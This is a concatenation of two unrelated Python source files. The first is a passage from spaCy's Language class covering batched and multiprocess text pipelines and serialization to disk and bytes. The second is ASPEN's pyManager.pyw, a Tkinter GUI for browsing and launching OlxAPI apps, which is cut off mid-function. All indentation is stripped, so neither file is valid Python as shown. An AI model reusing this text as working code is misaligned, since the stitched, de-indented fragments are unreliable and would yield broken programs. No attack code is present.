texts, raw_texts = itertools.tee(texts)
if is_python2 and n_process != 1:
user_warning(Warnings.W023)
n_process = 1
if n_threads != -1:
deprecation_warning(Warnings.W016)
if n_process == -1:
n_process = mp.cpu_count()
if as_tuples:
text_context1, text_context2 = itertools.tee(texts)
texts = (tc[0] for tc in text_context1)
contexts = (tc[1] for tc in text_context2)
docs = self.pipe(
texts,
batch_size=batch_size,
disable=disable,
component_cfg=component_cfg,
)
for doc, context in izip(docs, contexts):
yield (doc, context)
return
if component_cfg is None:
component_cfg = {}
pipes = []  # holds functools.partial objects so multiprocessing workers can be created easily
for name, proc in self.pipeline:
if name in disable:
continue
kwargs = component_cfg.get(name, {})
# Allow component_cfg to overwrite the top-level kwargs.
kwargs.setdefault("batch_size", batch_size)
if hasattr(proc, "pipe"):
f = functools.partial(proc.pipe, **kwargs)
else:
# Apply the function, but yield the doc
f = functools.partial(_pipe, proc=proc, kwargs=kwargs)
pipes.append(f)
if n_process != 1:
docs = self._multiprocessing_pipe(texts, pipes, n_process, batch_size)
else:
# if n_process == 1, no processes are forked.
docs = (self.make_doc(text) for text in texts)
for pipe in pipes:
docs = pipe(docs)
# Track weakrefs of "recent" documents, so that we can see when they
# expire from memory. When they do, we know we don't need old strings.
# This way, we avoid maintaining an unbounded growth in string entries
# in the string store.
recent_refs = weakref.WeakSet()
old_refs = weakref.WeakSet()
# Keep track of the original string data, so that if we flush old strings,
# we can recover the original ones. However, we only want to do this if we're
# really adding strings, to save up-front costs.
original_strings_data = None
nr_seen = 0
for doc in docs:
yield doc
if cleanup:
recent_refs.add(doc)
if nr_seen < 10000:
old_refs.add(doc)
nr_seen += 1
elif len(old_refs) == 0:
old_refs, recent_refs = recent_refs, old_refs
if original_strings_data is None:
original_strings_data = list(self.vocab.strings)
else:
keys, strings = self.vocab.strings._cleanup_stale_strings(
original_strings_data
)
self.vocab._reset_cache(keys, strings)
self.tokenizer._reset_cache(keys)
nr_seen = 0
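# Streaming usage sketch for `pipe` (illustrative only):
#
#     texts = ["First document.", "Second document."]
#     for doc in nlp.pipe(texts, batch_size=50, disable=["ner"]):
#         print([(t.text, t.pos_) for t in doc])
#
#     # With a context object attached to each text:
#     data = [("A text", {"id": 1}), ("Another text", {"id": 2})]
#     for doc, ctx in nlp.pipe(data, as_tuples=True):
#         print(ctx["id"], doc.text)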
def _multiprocessing_pipe(self, texts, pipes, n_process, batch_size):
# raw_texts is used later to stop iteration.
texts, raw_texts = itertools.tee(texts)
# for sending texts to worker
texts_q = [mp.Queue() for _ in range(n_process)]
# for receiving byte encoded docs from worker
bytedocs_recv_ch, bytedocs_send_ch = zip(
*[mp.Pipe(False) for _ in range(n_process)]
)
batch_texts = minibatch(texts, batch_size)
# Sender sends texts to the workers.
# This is necessary to properly handle texts of unbounded length,
# since not all of the data can be sent to the workers at once.
sender = _Sender(batch_texts, texts_q, chunk_size=n_process)
# send twice up front to keep the worker processes busy
sender.send()
sender.send()
procs = [
mp.Process(target=_apply_pipes, args=(self.make_doc, pipes, rch, sch))
for rch, sch in zip(texts_q, bytedocs_send_ch)
]
for proc in procs:
proc.start()
# Cycle through the channels so the order of the docs is preserved.
# Each received object is a batch of byte-encoded docs, so flatten them with chain.from_iterable.
byte_docs = chain.from_iterable(recv.recv() for recv in cycle(bytedocs_recv_ch))
docs = (Doc(self.vocab).from_bytes(byte_doc) for byte_doc in byte_docs)
try:
for i, (_, doc) in enumerate(zip(raw_texts, docs), 1):
yield doc
if i % batch_size == 0:
# tell `sender` that one batch was consumed.
sender.step()
finally:
for proc in procs:
proc.terminate()
def to_disk(self, path, exclude=tuple(), disable=None):
"""Save the current state to a directory. If a model is loaded, this
will include the model.
path (unicode or Path): Path to a directory, which will be created if
it doesn't exist.
exclude (list): Names of components or serialization fields to exclude.
DOCS: https://spacy.io/api/language#to_disk
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
path = util.ensure_path(path)
serializers = OrderedDict()
serializers["tokenizer"] = lambda p: self.tokenizer.to_disk(
p, exclude=["vocab"]
)
serializers["meta.json"] = lambda p: p.open("w").write(
srsly.json_dumps(self.meta)
)
for name, proc in self.pipeline:
if not hasattr(proc, "name"):
continue
if name in exclude:
continue
if not hasattr(proc, "to_disk"):
continue
serializers[name] = lambda p, proc=proc: proc.to_disk(p, exclude=["vocab"])
serializers["vocab"] = lambda p: self.vocab.to_disk(p)
util.to_disk(path, serializers, exclude)
def from_disk(self, path, exclude=tuple(), disable=None):
"""Loads state from a directory. Modifies the object in place and
returns it. If the saved `Language` object contains a model, the
model will be loaded.
path (unicode or Path): A path to a directory.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (Language): The modified `Language` object.
DOCS: https://spacy.io/api/language#from_disk
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
path = util.ensure_path(path)
deserializers = OrderedDict()
deserializers["meta.json"] = lambda p: self.meta.update(srsly.read_json(p))
deserializers["vocab"] = lambda p: self.vocab.from_disk(
p
) and _fix_pretrained_vectors_name(self)
deserializers["tokenizer"] = lambda p: self.tokenizer.from_disk(
p, exclude=["vocab"]
)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "from_disk"):
continue
deserializers[name] = lambda p, proc=proc: proc.from_disk(
p, exclude=["vocab"]
)
if not (path / "vocab").exists() and "vocab" not in exclude:
# Convert to list here in case exclude is (default) tuple
exclude = list(exclude) + ["vocab"]
util.from_disk(path, deserializers, exclude)
self._path = path
return self
def to_bytes(self, exclude=tuple(), disable=None, **kwargs):
"""Serialize the current state to a binary string.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (bytes): The serialized form of the `Language` object.
DOCS: https://spacy.io/api/language#to_bytes
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
serializers = OrderedDict()
serializers["vocab"] = lambda: self.vocab.to_bytes()
serializers["tokenizer"] = lambda: self.tokenizer.to_bytes(exclude=["vocab"])
serializers["meta.json"] = lambda: srsly.json_dumps(self.meta)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "to_bytes"):
continue
serializers[name] = lambda proc=proc: proc.to_bytes(exclude=["vocab"])
exclude = util.get_serialization_exclude(serializers, exclude, kwargs)
return util.to_bytes(serializers, exclude)
def from_bytes(self, bytes_data, exclude=tuple(), disable=None, **kwargs):
"""Load state from a binary string.
bytes_data (bytes): The data to load from.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (Language): The `Language` object.
DOCS: https://spacy.io/api/language#from_bytes
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
deserializers = OrderedDict()
deserializers["meta.json"] = lambda b: self.meta.update(srsly.json_loads(b))
deserializers["vocab"] = lambda b: self.vocab.from_bytes(
b
) and _fix_pretrained_vectors_name(self)
deserializers["tokenizer"] = lambda b: self.tokenizer.from_bytes(
b, exclude=["vocab"]
)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "from_bytes"):
continue
deserializers[name] = lambda b, proc=proc: proc.from_bytes(
b, exclude=["vocab"]
)
exclude = util.get_serialization_exclude(deserializers, exclude, kwargs)
util.from_bytes(bytes_data, deserializers, exclude)
return self
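# Serialization round-trip sketch (illustrative; assumes `nlp` and a compatible
# blank pipeline `nlp2` with the same components, and that `spacy` is importable
# at application level):
#
#     data = nlp.to_bytes(exclude=["tokenizer"])
#     nlp2.from_bytes(data, exclude=["tokenizer"])
#
#     nlp.to_disk("/tmp/my_model")
#     nlp3 = spacy.load("/tmp/my_model")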
def _fix_pretrained_vectors_name(nlp):
# TODO: Replace this once we handle vectors consistently as static
# data
if "vectors" in nlp.meta and nlp.meta["vectors"].get("name"):
nlp.vocab.vectors.name = nlp.meta["vectors"]["name"]
elif not nlp.vocab.vectors.size:
nlp.vocab.vectors.name = None
elif "name" in nlp.meta and "lang" in nlp.meta:
vectors_name = "%s_%s.vectors" % (nlp.meta["lang"], nlp.meta["name"])
nlp.vocab.vectors.name = vectors_name
else:
raise ValueError(Errors.E092)
if nlp.vocab.vectors.size != 0:
link_vectors_to_models(nlp.vocab)
for name, proc in nlp.pipeline:
if not hasattr(proc, "cfg"):
continue
proc.cfg.setdefault("deprecation_fixes", {})
proc.cfg["deprecation_fixes"]["vectors_name"] = nlp.vocab.vectors.name
class DisabledPipes(list):
"""Manager for temporary pipeline disabling."""
def __init__(self, nlp, *names):
self.nlp = nlp
self.names = names
# Important! Not deep copy -- we just want the container (but we also
# want to support people providing arbitrarily typed nlp.pipeline
# objects.)
self.original_pipeline = copy(nlp.pipeline)
list.__init__(self)
self.extend(nlp.remove_pipe(name) for name in names)
def __enter__(self):
return self
def __exit__(self, *args):
self.restore()
def restore(self):
"""Restore the pipeline to its state when DisabledPipes was created."""
current, self.nlp.pipeline = self.nlp.pipeline, self.original_pipeline
unexpected = [name for name, pipe in current if not self.nlp.has_pipe(name)]
if unexpected:
# Don't change the pipeline if we're raising an error.
self.nlp.pipeline = current
raise ValueError(Errors.E008.format(names=unexpected))
self[:] = []
def _pipe(docs, proc, kwargs):
# We added some args for pipe that __call__ doesn't expect.
kwargs = dict(kwargs)
for arg in ["n_threads", "batch_size"]:
if arg in kwargs:
kwargs.pop(arg)
for doc in docs:
doc = proc(doc, **kwargs)
yield doc
def _apply_pipes(make_doc, pipes, receiver, sender):
"""Worker for Language.pipe
Args:
receiver (multiprocessing.Queue): Queue holding batches of texts, filled by _Sender.
sender (multiprocessing.Connection): Pipe connection used to send back byte-encoded docs. Usually created by `multiprocessing.Pipe()`
"""
while True:
texts = receiver.get()
docs = (make_doc(text) for text in texts)
for pipe in pipes:
docs = pipe(docs)
# A Connection can only send picklable objects, so send a list (a generator cannot be pickled).
sender.send([doc.to_bytes() for doc in docs])
class _Sender:
"""Util for sending data to multiprocessing workers in Language.pipe"""
def __init__(self, data, queues, chunk_size):
self.data = iter(data)
self.queues = iter(cycle(queues))
self.chunk_size = chunk_size
self.count = 0
def send(self):
"""Send chunk_size items from self.data to channels."""
for item, q in itertools.islice(
zip(self.data, cycle(self.queues)), self.chunk_size
):
# cycle through the queues so the texts are distributed evenly
q.put(item)
def step(self):
"""Tell sender that comsumed one item.
Data is sent to the workers after every chunk_size calls."""
self.count += 1
if self.count >= self.chunk_size:
self.count = 0
self.send()
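# Illustrative sketch of multiprocess streaming with `Language.pipe` (not part of
# the original module and never called at import time; the model name
# "en_core_web_sm" is an assumption):
def _example_multiprocessing_pipe():
    import spacy  # hypothetical application-level usage
    nlp = spacy.load("en_core_web_sm")  # assumed model name
    texts = ("This is text number %d." % i for i in range(1000))
    # Worker processes rebuild the Doc objects from bytes, so order is preserved.
    docs = nlp.pipe(texts, n_process=2, batch_size=100)
    return [doc.text for doc in docs]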
|
pyManager.pyw
|
"""
OneLiner GUI tool for launching Python OlxAPI apps through the
OneLiner menu command Tools | OlxAPI App Launcher.
Note: The full file path of this Python program must be listed in the OneLiner App Manager
setting in the Tools | User-defined command | Setup dialog box.
"""
__author__ = "ASPEN Inc."
__copyright__ = "Copyright 2021, Advanced System for Power Engineering Inc."
__license__ = "All rights reserved"
__category__ = "Common"
__pyManager__ = "no"
__email__ = "support@aspeninc.com"
__status__ = "Release"
__version__ = "1.2.2"
# IMPORT -----------------------------------------------------------------------
import logging
import sys,os
#
PATH_FILE,PY_FILE = os.path.split(os.path.abspath(__file__))
PATH_LIB = os.path.split(PATH_FILE)[0]
if PATH_LIB not in sys.path:
os.environ['PATH'] = PATH_LIB + ";" + os.environ['PATH']
sys.path.insert(0, PATH_LIB)
#
import time
import pathlib
import importlib.util
from AppUtils import *
#
chekPythonVersion(PY_FILE)
#
import tkinter as tk
import tkinter.filedialog as tkf
from tkinter import ttk
import re
#
# INPUTS cmdline ---------------------------------------------------------------
PARSER_INPUTS = iniInput(usage = "GUI to browse and run Python apps in a directory")
#
PARSER_INPUTS.add_argument('-fi' , help = '*(str) OLR file path' , default = '',type=str,metavar='')
PARSER_INPUTS.add_argument('-tpath',help = ' (str) Output folder for PowerScript command file', default = '',type=str,metavar='')
PARSER_INPUTS.add_argument('-pk' , help = ' (str) Selected object in the 1-Liner diagram', default = [],nargs='+',metavar='')
ARGVS = parseInput(PARSER_INPUTS)
#
ARGSR,NARGS,TARGS = None,[],{}
#
def chekPathIsNotWM(path):
if not os.path.isdir(path):
return False
#
pathSysStart = ["C:\\Intel","C:\\MSOCache","C:\\PerfLogs","C:\\Recovery","C:\\System Volume Information","C:\\Windows","C:\\SYSTEM","C:\\ProgramData","C:\Documents and Settings",\
"C:\\Program Files\\Microsoft","C:\\Program Files\\Windows","C:\\Program Files\\Intel","C:\\Program Files\\CodeMeter",\
"C:\\Program Files (x86)\\Microsoft","C:\\Program Files (x86)\\Windows","C:\\Program Files (x86)\\Intel","C:\\Program Files (x86)\\CodeMeter",\
"C:\\Users\\All Users\\Microsoft\\","C:\\Users\\All Users\\Package Cache\\","C:\\Users\\Public\\Roaming\\","C:\\Users\\All Users\\Windows"]
for p1 in pathSysStart:
if path.startswith(p1):
return False
#
pathSysIn = ["\\$RECYCLE.BIN"]
for p1 in pathSysIn:
if p1 in path:
return False
#
return True
#
def isPyFile(f1):
if os.path.isfile(f1) and (f1.upper().endswith(".PY") or f1.upper().endswith(".PYW")):
return True
return False
#
def checkPyManagerVisu(f1):
try:
a1 = read_File_text(f1)
except:
return False
for i in range(len(a1)):
if i>100:
return False
if a1[i].startswith("__pyManager__"):
try:
yn = a1[i].split("=")[1]
yn = yn.replace(" ","")
#
try:
yn = float(yn)
if yn>0:
return True
except:
yn1 = (yn[1:len(yn)-1]).upper()
if yn1 =="YES" or yn1 == 'TRUE' or yn=='True':
return True
except:
pass
return False
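# Examples of the header flag this function detects (it only scans roughly the
# first 100 lines of a file); any of these forms makes the app visible in the manager:
#
#     __pyManager__ = "yes"
#     __pyManager__ = 'True'
#     __pyManager__ = 1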
#
def getPyFileShow(alpy):
res = []
for p1 in alpy:
if checkPyManagerVisu(p1):
res.append(p1)
return res
#
def pathHavePy(path):
# does not check for .py files in sub-folders
if not chekPathIsNotWM(path):
return False
#
try:
for p in os.listdir(path):
p1 = os.path.join(path,p)
if isPyFile(p1) or chekPathIsNotWM(p1):
return True
except:
pass
return False
#
def get_category(alpy):
res = []
for p1 in alpy:
a1 = read_File_text(p1)
c1 = 'Common'
for i in range(len(a1)):
if i>100:
break
s1 = str(a1[i]).replace(" ","")
if s1.startswith('__category__='):
as1 = s1.split('=')
c1 = as1[1]
c1 = str(c1.split('#')[0])
try:
c1 = c1[1:len(c1)-1]
except:
pass
break
res.append(c1)
return res
def corectOut(out):
res = out
idx1 = out.find('\nusage:')
if idx1>=0:
res = 'Description:' +out[idx1+6:]
#
res = res.replace('optional arguments:','Arguments: *(Required)')
res = res.replace(' -h, --help ','')
res = res.replace(' show this help message and exit','')
res = res.replace('-ut ','')
res = res.replace('(int) unit test [0-ignore, 1-unit test]','')
res = deleteLineBlank(res)
res = res.replace('Arguments: *(Required)','\nArguments: *(Required)')
return res
#
def getInputRequired(out):
res = []
an = out.split('\n')
test = False
for a1 in an:
if test:
a2 = a1.split()
try:
if a2[1].startswith('*'):
res.append(a2[0])
elif a2[1]=='[' and a2[2]=='...]' and a2[3].startswith('*'):
res.append(a2[0])
except:
pass
#
if a1.startswith('Arguments * Required,-h --help:'):
test = True
return res
#
def getAllPyFile(path,rer):
res = []
if not chekPathIsNotWM(path):
return res
try:
for p in os.listdir(path):
p1 = os.path.join(path,p)
if isPyFile(p1):
res.append(p1)
elif rer and os.path.isdir(p1):
for p2 in os.listdir(p1):
p3 = os.path.join(p1,p2)
if isPyFile(p3):
res.append(p3)
elif rer and os.path.isdir(p3):
r1 = getAllPyFile(p3,False)
res.extend(r1)
except:
pass
return res
#
class MainGUI(tk.Frame):
def __init__(self, master):
## master.attributes('-topmost', True)
self.splitter = tk.PanedWindow(master, orient=tk.HORIZONTAL)
self.master = master
sw = master.winfo_screenwidth()
sh = master.winfo_screenheight()
self.master.resizable(0,0)# fixed size
w = min(1000,sw)
h = min(650,sh)
master.geometry("{0}x{1}+{2}+{3}".format(w,h,int(sw/2-w/2),int(sh/2-h/2)))
master.wm_title("Python OlxAPI Apps")
## pathico = os.path.join(os.path.dirname(sys.executable) ,"DLLs")
## setIco(master,pathico,"pyc.ico")
setIco_1Liner(master)
remove_button(self.master)
self.currentPy = ""
self.nodeFavorite = []
self.nodeRecent = []
self.nodes = dict()
self.pathFile = dict()
#
self.reg1 = WIN_REGISTRY(path = "SOFTWARE\\ASPEN\\OneLiner\\PyManager\\recents" ,keyUser="",nmax =6)
self.reg2 = WIN_REGISTRY(path = "SOFTWARE\\ASPEN\\OneLiner\\PyManager\\dir" ,keyUser="",nmax =1)
self.reg3 = WIN_REGISTRY(path = "SOFTWARE\\ASPEN\\OneLiner\\PyManager\\favorites",keyUser="",nmax =20)
self.initGUI()
#
def initGUI(self):
# left-side
frame_left = tk.Frame(self.splitter)
self.tree = ttk.Treeview(frame_left, show='tree')
ysb1 = ttk.Scrollbar(frame_left, orient='vertical' , command=self.tree.yview)
xsb1 = ttk.Scrollbar(frame_left, orient='horizontal', command=self.tree.xview)
# left-side widget layout
self.tree.grid(row=0, column=0,padx=0,pady=0, sticky='NSEW')
ysb1.grid(row=0, column=1, sticky='ns')
xsb1.grid(row=1, column=0, sticky='ew')
# setup
self.tree.configure(yscrollcommand=lambda f, l:self.autoscroll(ysb1,f,l), xscrollcommand=lambda f, l:self.autoscroll(xsb1,f,l))
self.tree.configure(yscrollcommand=ysb1.set, xscrollcommand=xsb1.set)
self.tree.column("#0",minwidth=300, stretch=True)
#
frame_l1 = tk.Frame(frame_left)
frame_l1.grid(row=2, column=0,padx=0, pady=14)
#
self.bt_dir = tk.Button(frame_l1, text="Change directory",width = 27,command=self.open_dir)
frame_l11 = tk.Frame(frame_l1)
self.bt_add = tk.Button(frame_l11, text="Add favorite",width = 12,command=self.addFavorite)
self.bt_rmv = tk.Button(frame_l11, text="Remove favorite",width = 12,command=self.removeFavorite)
self.bt_dir.grid(row=0, column=1,padx=5,pady=5)
frame_l11.grid(row=1, column=1)
self.bt_add.grid(row=1, column=1,padx=5,pady=5)
self.bt_rmv.grid(row=1, column=3,padx=5,pady=5)
#--------------------------------------------------------------------------RIGHT
frame_right = tk.Frame(self.splitter)
frame_r1 = tk.Frame(frame_right)
frame_r1.grid(row=0, column=0,sticky='',pady=5,padx=5)#,
self.text1 = tk.Text(frame_r1,wrap = tk.NONE,width=500,height=22)#
# yScroll
ysb2 = ttk.Scrollbar(frame_r1, orient='vertical' , command=self.text1.yview)
xsb2 = ttk.Scrollbar(frame_r1, orient='horizontal', command=self.text1.xview)
ysb2.grid(row=1, column=1, sticky='ns')
xsb2.grid(row=2, column=0, sticky='ew')
self.text1.configure(yscrollcommand=lambda f, l:self.autoscroll(ysb2,f,l), xscrollcommand=lambda f, l:self.autoscroll(xsb2,f,l))
self.text1.configure(yscrollcommand=ysb2.set, xscrollcommand=xsb2.set)
self.text1.grid(row=1, column=0, sticky='ns')
frame_r1.columnconfigure(0, weight=1)
frame_r1.rowconfigure(0, weight=1)
frame_r1.pack(fill=tk.BOTH, expand=True)
# ----------------------------------------------------------------------------
frame_r2 = tk.Frame(frame_right)
#
arg = tk.Label(frame_r2, text="Arguments")
arg.grid(row=0, column=0, sticky='nw')
self.text2 = tk.Text(frame_r2,wrap = tk.NONE,width=500,height=8)
# yScroll
ysb3 = ttk.Scrollbar(frame_r2, orient='vertical' , command=self.text2.yview)
xsb3 = ttk.Scrollbar(frame_r2, orient='horizontal', command=self.text2.xview)
ysb3.grid(row=1, column=1, sticky='ns')
xsb3.grid(row=2, column=0, sticky='ew')
self.text2.configure(yscrollcommand=lambda f, l:self.autoscroll(ysb3,f,l), xscrollcommand=lambda f, l:self.autoscroll(xsb3,f,l))
self.text2.configure(yscrollcommand=ysb3.set, xscrollcommand=xsb3.set)
self.text2.grid(row=1, column=0, sticky='ns')
frame_r2.columnconfigure(0, weight=1)
frame_r2.rowconfigure(1, weight=1)
frame_r2.pack(fill=tk.BOTH, expand=True)
# ----------------------------------------------------------------------------
frame_r3 = tk.Frame(frame_right)
frame_r3.columnconfigure(1, weight=1)
frame_r3.rowconfigure(1, weight=1)
frame_r3.pack(fill=tk.BOTH,expand=True)
# button launch
self.bt_launch = tk.Button(frame_r3, text="Launch",width =12,command=self.launch)
self.bt_launch.grid(row=0, column=1,padx = 0,pady=0)
#
frame_r4 = tk.Frame(frame_right)
frame_r4.columnconfigure(1, weight=1)
frame_r4.rowconfigure(5, weight=1)
#
#button edit
self.bt_edit = tk.Button(frame_r4 , text = 'Edit in IDE',width =12,command=self.editPyIDE)
self.bt_edit.grid(row=1, column=0,padx = 20,pady=35)
#button exit
bt_exit = tk.Button(frame_r4 , text = 'Exit',width =12,command=self.exit)
bt_exit.grid(row=1, column=3,padx =0,pady=30)
#
self.bt_help = tk.Button(frame_r4 , text = 'Help',width =12,command=self.getHelp)
self.bt_help.grid(row=1, column=5,padx = 30,pady=30)
frame_r4.pack(fill=tk.BOTH,expand=True)
#
frame_left.columnconfigure(0, weight=1,minsize=210)
frame_left.rowconfigure(0, weight=1,minsize=210)
#
frame_right.columnconfigure(0, weight=1)
frame_right.rowconfigure(1, weight=1)
frame_right.pack(fill=tk.BOTH, expand=True)
#
# overall layout
self.splitter.add(frame_left)
self.splitter.add(frame_right)
self.splitter.pack(fill=tk.BOTH, expand=True)
#
self.dirPy = self.reg2.getValue0()
#
self.dirPy = os.path.abspath(self.dirPy)
self.reg2.appendValue(self.dirPy)
#
self.builderTree()
#
self.setSTButton('disabled')
#
def flush(self):
pass
#
def write(self, txt):
self.textc.insert(tk.INSERT,txt)
#
def clearConsol(self):
self.textc.delete(1.0,tk.END)
#
def getHelp(self):
gui_info("INFO","@To Add")
#
def resetTree(self):
x = self.tree.get_children()
for item in x: ## Changing all children from root item
self.tree.delete(item)
#
def builderTree(self):
self.insert_nodeFavorite('')
self.insert_nodeRecent('')
self.insert_node1('', self.dirPy, self.dirPy)
self.tree.bind('<<TreeviewSelect>>', self.open_node) # simple click
#
def autoscroll(self, sbar, first, last):
"""Hide and show scrollbar as needed."""
first, last = float(first), float(last)
if first <= 0 and last >= 1:
sbar.grid_remove()
else:
sbar.grid()
sbar.set(first, last)
#
def insert_node1(self, parent, text, abspath):
alpy = getAllPyFile(abspath,True)
alpy = getPyFileShow(alpy)
if len(alpy)==0:
node = self.tree.insert(parent, 'end', text=text, open=True)
self.pathFile[node] = abspath
node1 = self.tree.insert(node, 'end', text="None", open=True)
self.pathFile[node1] = abspath
return
categ = get_category(alpy)
categF = list(set(categ))
categF.sort(reverse=True)
#
node = self.tree.insert(parent, 'end', text=text, open=True)
self.pathFile[node] = abspath
for c1 in categF:
node1 = self.tree.insert(node, 'end', text=c1, open=True)
self.pathFile[node1] = abspath
for i in range(len(alpy)):
ci = categ[i]
p1 = alpy[i]
if ci==c1:
path1,py1 = os.path.split(os.path.abspath(p1))
nodei = self.tree.insert(node1, 'end', text=py1, open=False)
self.pathFile[nodei] = p1
#
def insert_node(self, parent, text, abspath):
hp1 = pathHavePy(abspath)
hp2 = isPyFile(abspath) and checkPyManagerVisu(abspath)
if hp1 or hp2 :
node = self.tree.insert(parent, 'end', text=text, open=False)
self.pathFile[node] = abspath
#
if hp1:
self.nodes[node] = abspath
self.tree.insert(node, 'end',open=False)
#
def insert_node0(self, parent, text, abspath):
node = self.tree.insert(parent, 'end', text=text, open=True)
self.pathFile[node] = abspath
#
if pathHavePy(abspath):
for p in os.listdir(abspath):
p1 = os.path.join(abspath, p)
if isPyFile(p1) and checkPyManagerVisu(p1):
node1 = self.tree.insert(node, 'end', text=p, open=False)
self.pathFile[node1] = p1
elif pathHavePy(p1):
self.insert_node(node, p, p1)
#
def insert_nodeRecent(self, node0):
if node0=='':
node = self.tree.insert('', 'end', text="Recent", open=True)
self.pathFile[node] = "Recent"
else:
node = node0
#
recent = self.reg1.getAllValue()
self.nodeRecent = [node]
#
for r1 in recent:
if isPyFile(r1) and checkPyManagerVisu(r1):
r1 = str(pathlib.Path(r1).resolve())
path1,py1 = os.path.split(os.path.abspath(r1))
node1 = self.tree.insert(node, 'end', text=py1, open=False)
self.pathFile[node1] = r1
self.nodeRecent.append(node1)
#
def insert_nodeFavorite(self, node0):
if node0=='':
node = self.tree.insert('', 'end', text="Favorite", open=True)
self.pathFile[node] = "Favorite"
else:
node = node0
#
fav = self.reg3.getAllValue()
self.nodeFavorite = [node]
#
for f1 in fav:
if isPyFile(f1) and checkPyManagerVisu(f1):
f1 = str(pathlib.Path(f1).resolve())
path1,py1 = os.path.split(os.path.abspath(f1))
node1 = self.tree.insert(node, 'end', text=py1, open=False)
self.pathFile[node1] = f1
self.nodeFavorite.append(node1)
#
def open_node(self, event):
node = self.tree.focus()
abspath = self.nodes.pop(node, None)
if abspath:#path
self.setSTButton('disabled')
self.tree.delete(self.tree.get_children(node))
if pathHavePy(abspath):
for p in os.listdir(abspath):
p1 = os.path.join(abspath, p)
self.insert_node(node, p, p1)
else:# File
v1 = self.pathFile[node]
if os.path.isfile(v1):
self.currentPy = os.path.abspath(v1)
self.text1.configure(state='normal')
self.setSTButton('active')
self.showPy()
#
if not node in self.nodeFavorite:
self.bt_rmv['state']='disabled'
#
else:
self.setSTButton('disabled')
#
def setSTButton(self,stt):
self.bt_add['state']=stt
self.bt_rmv['state']=stt
self.bt_launch['state']=stt
self.bt_edit['state']=stt
#
def exit1(self):
self.master.destroy()
#
def exit(self):
global ARGSR
ARGSR = None
self.master.destroy()
#
def open_dir(self):
"""Open a directory."""
self.dirPy = tkf.askdirectory()
if self.dirPy!="":
self.dirPy = os.path.abspath(self.dirPy)
#
self.resetTree()
self.builderTree()
self.reg2.appendValue(self.dirPy)
#
def addFavorite(self):
if self.reg3.appendValue(self.currentPy):
for i in range(1,len(self.nodeFavorite)):
self.tree.delete(self.nodeFavorite[i])
#
self.insert_nodeFavorite(self.nodeFavorite[0])
#
def updateRecents(self):
if self.reg1.appendValue(self.currentPy):
for i in range(1,len(self.nodeRecent)):
self.tree.delete(self.nodeRecent[i])
#
self.insert_nodeRecent(self.nodeRecent[0])
#
def removeFavorite(self):
self.reg3.deleteValue(self.currentPy)
for i in range(1,len(self.nodeFavorite)):
self.tree.delete(self.nodeFavorite[i])
#
self.insert_nodeFavorite(self.nodeFavorite[0])
#
def getVersion(self):
for i in range(len(self.currentPy_as)):
if self.currentPy_as[i].startswith("__version__"):
return self.currentPy_as[i]
if i>100:
break
return "__version__ = Unknown"
#
def showPy(self):
#
global NARGS,TARGS,IREQUIRED
IREQUIRED = []
try:
filehandle = open(self.currentPy, 'a' )
filehandle.close()
self.bt_edit['state']='active'
except IOError:
self.bt_edit['state']='disabled'
#
self.currentPy_as,se = read_File_text_0(self.currentPy)
self.text1.delete('1.0', tk.END)
self.text2.delete('1.0', tk.END)
self.text1.insert(tk.END, self.currentPy.replace('\\','/')+"\n")
self.text1.insert(tk.END, self.getVersion()+"\n")
#
o1 = None
if haveParseInput(self.currentPy_as):
out,err,returncode = runSubprocess_getHelp(self.currentPy)
if returncode!=0:
self.text1.insert(tk.END, err.strip())
return
o1 = out.replace(" ","")
#
if o1==None:
self.text1.insert(tk.END, se)
return
#
IREQUIRED = getInputRequired (out)
#
# out = corectOut(out)
self.text1.insert(tk.END, out)
self.text1.configure(state='disabled')
#
try:
path = os.path.dirname(self.currentPy)
if path not in sys.path:
os.environ['PATH'] = path + ";" + os.environ['PATH']
sys.path.insert(0, path)
#
spec = importlib.util.spec_from_file_location('', self.currentPy)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
vala = module.ARGVS.__dict__
valb = dict(sorted(vala.items(), key=lambda item: item[0]))
#
NARGS = ['-h']
TARGS = {'-h':str}
for key, val in valb.items():
s1 = '-'+key
NARGS.append(s1)
TARGS[s1]= type(val)
if key not in ['ut']:
s1 +=' '
#
try:
val0 = ARGVS.__dict__[key]
except:
val0 = val
if type(val)==list:
for v1 in val0:
s1 += "\"" + v1 + "\"" + " "
else:
if type(val)==str :
s1 += "\"" + str(val0) + "\""
else:
s1 += str(val0)
#
s1 +="\n"
s1 = s1.replace('\\','/')
self.text2.insert(tk.END,s1)
except:
pass
#
def editPyIDE(self):
app = os.path.dirname(sys.executable)+"\\Lib\\idlelib\\idle.bat"
args = [app,self.currentPy]
runSubprocess_noWait(args) #run subprocess without waiting
#
def errorInputArgument(self,v1,se):
global ARGSR
ARGSR = None
sMain= se.ljust(30) +'\n'+ v1
gui_info(sTitle="ERROR Input Argument",sMain=sMain)
logging.error('\n'+sMain)
#
def launch(self):
global ARGSR,IREQUIRED
#
logging.info('run : '+self.currentPy)
#
pathe = os.path.dirname(sys.executable)
if (self.currentPy.upper()).endswith('.PYW'):
ARGSR = [os.path.join(pathe,'pythonw.exe')]
else:
ARGSR = [os.path.join(pathe,'python.exe')]
#
ARGSR.append(self.currentPy)
#
a1 = (self.text2.get(1.0, tk.END)).split("\n")
#
errInputRequired = []
demo1 = 0
#
for i in range(len(a1)):
v1 = (a1[i]).strip()
#
if v1!='':
k1 = str(v1).find(" ")
if k1>0:
u1 = v1[:k1]
u2 = v1[k1+1:]
else:
u1 = v1
u2 =''
#
if u1 not in NARGS:
self.errorInputArgument(v1,'Input not found:')
return
#
t1 = TARGS[u1]
u2 = u2.strip()
u2 = u2.strip('"')
u2 = u2.strip("'")
#
if u1=='-demo' and u2:
if u2 !='0':
demo1 = 1
#
if u1 in IREQUIRED and u2=='':
errInputRequired.append(v1)
#
if u2:
#
try:
if checkSpecialCharacter(u2):
self.errorInputArgument(v1,'Special Character found:')
return
except:
pass
#
try:
val = t1(u2)
except:
